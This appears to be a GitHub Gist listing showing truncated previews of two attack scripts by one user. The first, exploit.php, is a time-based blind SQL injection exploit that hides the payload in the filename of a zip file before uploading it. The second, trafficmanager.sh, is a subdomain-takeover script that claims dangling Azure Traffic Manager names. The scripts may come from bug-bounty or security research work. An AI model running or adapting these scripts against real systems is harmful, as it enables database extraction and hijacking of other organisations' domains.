mcipekci
mcipekci
/ exploit.php
Created
March 21, 2023 13:35
Exploiting SQL injection via unzipped file contents
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // Prepare File | |
| $file = tempnam("/tmp", "zip"); | |
| $zip = new ZipArchive(); | |
| $zip->open($file, ZipArchive::OVERWRITE); | |
| // Add file name with SQLi payload | |
| $zip->addFromString("'+(CASE WHEN 1=".$_GET['value']." THEN 1 ELSE sleep(10) END)+'", ""); | |
| // Close and send to the server | |
| $zip->close(); | |
| $cf = new CURLFile($file); |
mcipekci
/ trafficmanager.sh
Created
March 31, 2020 19:19
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| echo "--------------------------------------" | |
| echo "Trying to takeover $1 on Azure TrafficManager" | |
| domainName=$1.trafficmanager.net | |
| echo "Checking DNS state for $domainName" | |
| dnsState=$(dig $domainName @tm2.msft.net | grep NXDOMAIN) | |
| if [[ ! -z $dnsState ]]; then | |
| echo "$1 is pointing NXDOMAIN, trying to create it..." | |
| NEW_UUID=$(echo $1 | sed 's/\.//g') | |
| result=$(azure network traffic-manager profile create --name $NEW_UUID -d $domainName -m Performance -p http -p https -r "/" --json 2>/dev/null | jq .profile.domainName | sed 's/\"//g') |